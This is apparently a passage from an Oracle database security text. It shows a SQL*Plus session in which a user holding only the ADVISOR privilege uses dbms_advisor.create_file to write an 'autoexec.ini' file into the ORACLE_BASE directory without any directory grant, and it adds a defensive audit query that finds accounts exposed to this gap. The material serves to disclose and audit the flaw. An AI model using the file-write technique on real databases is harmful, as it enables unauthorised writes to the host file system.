Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options
ADTEST@192.168.1.2:1522/orcl4>select * from user_sys_privs;
USERNAME  PRIVILEGE              ADM COM
--------- ---------------------- --- ---
ADTEST    SELECT ANY DICTIONARY  NO  NO
ADTEST    CREATE SESSION         NO  YES
ADTEST    ADVISOR                NO  YES
ADTEST@192.168.1.2:1522/orcl4>select * from user_role_privs;
no rows selected
ADTEST@192.168.1.2:1522/orcl4>select * from dba_role_privs where grantee='PUBLIC';
no rows selected
ADTEST@192.168.1.2:1522/orcl4>exec dbms_advisor.create_file ('malicious content', 'ORACLE_BASE','autoexec.ini');
PL/SQL procedure successfully completed.
ADTEST@192.168.1.2:1522/orcl4>select * from dba_tab_privs where table_name='ORACLE_BASE';
no rows selected
So the preceding code has shown that a user with the ADVISOR privilege can write to a DB directory location
without needing any privileges on that DB directory. Thus the default permissions in the 12c release are enough for
ADVISOR to write to the OS. What does this mean in terms of security? Well, a user with ADVISOR can write to the
root of a C:/ drive, as shown in Figure 10-1.
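A defender's view of the same gap, as an added example that is not from the original text: the query below lists accounts that hold ADVISOR (directly or through nested roles) next to every directory object on which they have no direct WRITE grant. It assumes the behaviour shown in the transcript applies to any directory object, and that it is run by a user who can read the DBA_* views.

```sql
-- Added audit example (not from the original page).
-- Step 1: every grantee (user or role) that ends up with ADVISOR,
--         either directly or through a chain of role grants.
WITH advisor_holders AS (
  SELECT grantee
    FROM dba_sys_privs
   WHERE privilege = 'ADVISOR'
  UNION
  SELECT grantee
    FROM dba_role_privs
   START WITH granted_role IN (SELECT grantee
                                 FROM dba_sys_privs
                                WHERE privilege = 'ADVISOR')
 CONNECT BY PRIOR grantee = granted_role
)
-- Step 2: pair each such account with the directory objects it has no
--         WRITE grant on. DBA_TAB_PRIVS shows nothing for these pairs,
--         yet per the transcript ADVISOR alone was enough to write there.
--         A grant of ADVISOR to PUBLIC is expanded to all listed users.
--         Simplification: only direct WRITE grants are checked, not
--         WRITE received through a role.
SELECT DISTINCT
       u.username,
       d.directory_name,
       d.directory_path
  FROM advisor_holders h
  JOIN dba_users u
    ON (u.username = h.grantee OR h.grantee = 'PUBLIC')
 CROSS JOIN dba_directories d
 WHERE u.oracle_maintained = 'N'          -- skip Oracle-supplied accounts (12c column)
   AND NOT EXISTS (SELECT 1
                     FROM dba_tab_privs tp
                    WHERE tp.grantee    = u.username
                      AND tp.table_name = d.directory_name
                      AND tp.privilege  = 'WRITE')
 ORDER BY u.username, d.directory_name;
```

For the ADTEST account in the transcript, this would return one row per directory object, including ORACLE_BASE.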